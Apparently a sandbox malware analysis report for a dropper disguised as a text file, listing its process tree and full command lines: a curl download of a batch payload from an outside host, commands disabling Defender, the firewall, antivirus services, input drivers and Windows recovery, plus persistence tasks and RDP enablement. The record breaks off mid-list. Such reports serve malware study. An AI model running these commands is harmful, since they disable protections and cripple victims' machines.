Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeDebugPrivilege	6128	taskkill.exe
Token: SeDebugPrivilege	6020	taskkill.exe
Token: SeDebugPrivilege	3468	taskkill.exe
Token: SeDebugPrivilege	5160	taskkill.exe
Token: SeDebugPrivilege	2060	taskkill.exe
Token: SeShutdownPrivilege	4244	powercfg.exe
Token: SeCreatePagefilePrivilege	4244	powercfg.exe
Token: SeShutdownPrivilege	800	powercfg.exe
Token: SeCreatePagefilePrivilege	800	powercfg.exe
Token: SeShutdownPrivilege	4480	powercfg.exe
Token: SeCreatePagefilePrivilege	4480	powercfg.exe
Token: SeShutdownPrivilege	4756	powercfg.exe
Token: SeCreatePagefilePrivilege	4756	powercfg.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
4972	powershell.exe
4832	powershell.exe
2976	msedge.exe
19632	Process not Found

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
22752	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4464 wrote to memory of 5228	4464	READ ME BEFOR OPEN.txt.exe	78
PID 4464 wrote to memory of 5228	4464	READ ME BEFOR OPEN.txt.exe	78
PID 4464 wrote to memory of 2080	4464	READ ME BEFOR OPEN.txt.exe	79
PID 4464 wrote to memory of 2080	4464	READ ME BEFOR OPEN.txt.exe	79
PID 4464 wrote to memory of 6116	4464	READ ME BEFOR OPEN.txt.exe	80
PID 4464 wrote to memory of 6116	4464	READ ME BEFOR OPEN.txt.exe	80
PID 6116 wrote to memory of 3076	6116	cmd.exe	82
PID 6116 wrote to memory of 3076	6116	cmd.exe	82
PID 6116 wrote to memory of 2752	6116	cmd.exe	83
PID 6116 wrote to memory of 2752	6116	cmd.exe	83
PID 6116 wrote to memory of 4896	6116	cmd.exe	84
PID 6116 wrote to memory of 4896	6116	cmd.exe	84
PID 6116 wrote to memory of 5288	6116	cmd.exe	86
PID 6116 wrote to memory of 5288	6116	cmd.exe	86
PID 4896 wrote to memory of 4764	4896	cmd.exe	88
PID 4896 wrote to memory of 4764	4896	cmd.exe	88
PID 5288 wrote to memory of 4716	5288	cmd.exe	89
PID 5288 wrote to memory of 4716	5288	cmd.exe	89
PID 4896 wrote to memory of 4972	4896	cmd.exe	90
PID 4896 wrote to memory of 4972	4896	cmd.exe	90
PID 5288 wrote to memory of 4832	5288	cmd.exe	91
PID 5288 wrote to memory of 4832	5288	cmd.exe	91
PID 4896 wrote to memory of 5136	4896	cmd.exe	92
PID 4896 wrote to memory of 5136	4896	cmd.exe	92
PID 5288 wrote to memory of 3008	5288	cmd.exe	93
PID 5288 wrote to memory of 3008	5288	cmd.exe	93
PID 5228 wrote to memory of 5292	5228	Rasauq SoftWorks.exe	94
PID 5228 wrote to memory of 5292	5228	Rasauq SoftWorks.exe	94
PID 4896 wrote to memory of 1904	4896	cmd.exe	98
PID 4896 wrote to memory of 1904	4896	cmd.exe	98
PID 4896 wrote to memory of 1804	4896	cmd.exe	99
PID 4896 wrote to memory of 1804	4896	cmd.exe	99
PID 4896 wrote to memory of 1688	4896	cmd.exe	101
PID 4896 wrote to memory of 1688	4896	cmd.exe	101
PID 4896 wrote to memory of 752	4896	cmd.exe	102
PID 4896 wrote to memory of 752	4896	cmd.exe	102
PID 4896 wrote to memory of 4512	4896	cmd.exe	103
PID 4896 wrote to memory of 4512	4896	cmd.exe	103
PID 4896 wrote to memory of 3340	4896	cmd.exe	105
PID 4896 wrote to memory of 3340	4896	cmd.exe	105
PID 4896 wrote to memory of 2788	4896	cmd.exe	106
PID 4896 wrote to memory of 2788	4896	cmd.exe	106
PID 4896 wrote to memory of 3268	4896	cmd.exe	107
PID 4896 wrote to memory of 3268	4896	cmd.exe	107
PID 4896 wrote to memory of 3632	4896	cmd.exe	108
PID 4896 wrote to memory of 3632	4896	cmd.exe	108
PID 5228 wrote to memory of 692	5228	Rasauq SoftWorks.exe	109
PID 5228 wrote to memory of 692	5228	Rasauq SoftWorks.exe	109
PID 4896 wrote to memory of 3860	4896	cmd.exe	111
PID 4896 wrote to memory of 3860	4896	cmd.exe	111
PID 4896 wrote to memory of 132	4896	cmd.exe	112
PID 4896 wrote to memory of 132	4896	cmd.exe	112
PID 4896 wrote to memory of 2428	4896	cmd.exe	113
PID 4896 wrote to memory of 2428	4896	cmd.exe	113
PID 5228 wrote to memory of 5936	5228	Rasauq SoftWorks.exe	114
PID 5228 wrote to memory of 5936	5228	Rasauq SoftWorks.exe	114
PID 4896 wrote to memory of 5580	4896	cmd.exe	116
PID 4896 wrote to memory of 5580	4896	cmd.exe	116
PID 4896 wrote to memory of 1668	4896	cmd.exe	117
PID 4896 wrote to memory of 1668	4896	cmd.exe	117
PID 4896 wrote to memory of 3532	4896	cmd.exe	213
PID 4896 wrote to memory of 3532	4896	cmd.exe	213
PID 4896 wrote to memory of 3344	4896	cmd.exe	119
PID 4896 wrote to memory of 3344	4896	cmd.exe	119

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

Hidden Files and Directories

T1564.001

pid	Process
5836	attrib.exe
1196	attrib.exe

C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe
"C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4464
- C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
  "C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5200
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5108
- C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
  "C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2080
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:5836
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC256.tmp.bat""
    3⤵
    PID:6504
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:6732
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
      4⤵
      Executes dropped EXE
      PID:6892
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
        5⤵
        
        PID:7212
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7288
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
        5⤵
        
        PID:7508
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:7452
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "
  2⤵
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:6116
- - C:\Windows\system32\curl.exe
    curl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
    3⤵
    PID:3076
- - C:\Windows\system32\curl.exe
    curl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
    3⤵
    PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat"
    3⤵
    - Drops file in Drivers directory
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of WriteProcessMemory
    PID:4896
  - - C:\Windows\system32\openfiles.exe
      openfiles
      4⤵
      PID:4764
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(new-object -com shell.application).minimizeall()"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:4972
  - - C:\Windows\system32\curl.exe
      curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
      4⤵
      PID:5136
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:1904
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
      4⤵
      PID:1804
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
      4⤵
      PID:1688
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:752
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
      4⤵
      PID:4512
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
      4⤵
      PID:3340
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:2788
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
      4⤵
      PID:3268
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3632
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:3860
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:132
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2428
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:5580
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start=disabled
      4⤵
      Launches sc.exe
      PID:1668
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:3532
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:3344
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:4956
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:3384
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:5096
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:3784
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
      4⤵
      PID:2636
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
      4⤵
      PID:5540
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:5032
  - - C:\Windows\system32\cmd.exe
      cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
      4⤵
      PID:2908
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        5⤵
        
        PID:3732
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1856
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2084
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      4⤵
      PID:6040
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
      4⤵
      PID:5808
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
      4⤵
      PID:5268
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
      4⤵
      PID:6020
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      4⤵
      PID:5436
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
      4⤵
      PID:4672
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
      4⤵
      PID:5552
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:2452
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
      4⤵
      PID:1528
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
      4⤵
      PID:1348
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in System32 directory
      Drops file in Windows directory
      PID:3260
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5688
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5368
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3076
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4244
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:4960
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /deletevalue {default} recoveryenabled
      4⤵
      Modifies boot configuration data using bcdedit
      PID:4480
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
      4⤵
      PID:4752
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      PID:4764
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:480
  - - C:\Windows\system32\net.exe
      net stop "SDRSVC"
      4⤵
      PID:3016
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SDRSVC"
        5⤵
        
        PID:4468
  - - C:\Windows\system32\net.exe
      net stop "WinDefend"
      4⤵
      PID:3524
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WinDefend"
        5⤵
        
        PID:5712
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im "MSASCui.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4352
  - - C:\Windows\system32\net.exe
      net stop "security center"
      4⤵
      PID:5072
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "security center"
        5⤵
        
        PID:1664
  - - C:\Windows\system32\netsh.exe
      netsh firewall set opmode mode-disable
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:5592
  - - C:\Windows\system32\net.exe
      net stop "wuauserv"
      4⤵
      PID:1080
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wuauserv"
        5⤵
        
        PID:1228
  - - C:\Windows\system32\net.exe
      net stop "Windows Defender Service"
      4⤵
      PID:3532
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Windows Defender Service"
        5⤵
        
        PID:1680
  - - C:\Windows\system32\net.exe
      net stop "Windows Firewall"
      4⤵
      PID:5256
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Windows Firewall"
        5⤵
        
        PID:484
  - - C:\Windows\system32\net.exe
      net stop sharedaccess
      4⤵
      PID:2156
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop sharedaccess
        5⤵
        
        PID:5840
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:1308
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:1808
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:5096
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start= disabled
      4⤵
      Launches sc.exe
      PID:3784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableAntiTamper $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3320
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5988
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:644
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1800
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbam.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4980
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MBAMService.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3924
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamtray.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4644
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamscheduler.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1204
  - - C:\Windows\system32\sc.exe
      sc stop MBAMService
      4⤵
      PID:5396
  - - C:\Windows\system32\sc.exe
      sc delete MBAMService
      4⤵
      Launches sc.exe
      PID:772
  - - C:\Windows\system32\sc.exe
      sc stop MBAMProtector
      4⤵
      Launches sc.exe
      PID:5508
  - - C:\Windows\system32\sc.exe
      sc delete MBAMProtector
      4⤵
      Launches sc.exe
      PID:4012
  - - C:\Windows\system32\sc.exe
      sc stop MBAMChameleon
      4⤵
      Launches sc.exe
      PID:2496
  - - C:\Windows\system32\sc.exe
      sc delete MBAMChameleon
      4⤵
      Launches sc.exe
      PID:5184
  - - C:\Windows\system32\sc.exe
      sc stop MBAMFarflt
      4⤵
      Launches sc.exe
      PID:3236
  - - C:\Windows\system32\sc.exe
      sc delete MBAMFarflt
      4⤵
      Launches sc.exe
      PID:4540
  - - C:\Windows\system32\sc.exe
      sc stop MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:976
  - - C:\Windows\system32\sc.exe
      sc delete MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:3372
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:5480
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:2204
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
      4⤵
      PID:5272
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
      4⤵
      PID:4480
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
      4⤵
      PID:4756
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
      4⤵
      PID:4752
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdservicehost.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2756
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdagent.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4716
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdredline.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5136
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdparentalservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1472
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdreinit.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1988
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdsubwiz.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4408
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM seccenter.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4828
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM vsserv.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4004
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM epssecurityservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:304
  - - C:\Windows\system32\sc.exe
      sc stop bdservicehost
      4⤵
      Launches sc.exe
      PID:5596
  - - C:\Windows\system32\sc.exe
      sc delete bdservicehost
      4⤵
      Launches sc.exe
      PID:3772
  - - C:\Windows\system32\sc.exe
      sc stop bdagent
      4⤵
      Launches sc.exe
      PID:324
  - - C:\Windows\system32\sc.exe
      sc delete bdagent
      4⤵
      Launches sc.exe
      PID:3884
  - - C:\Windows\system32\sc.exe
      sc stop bdredline
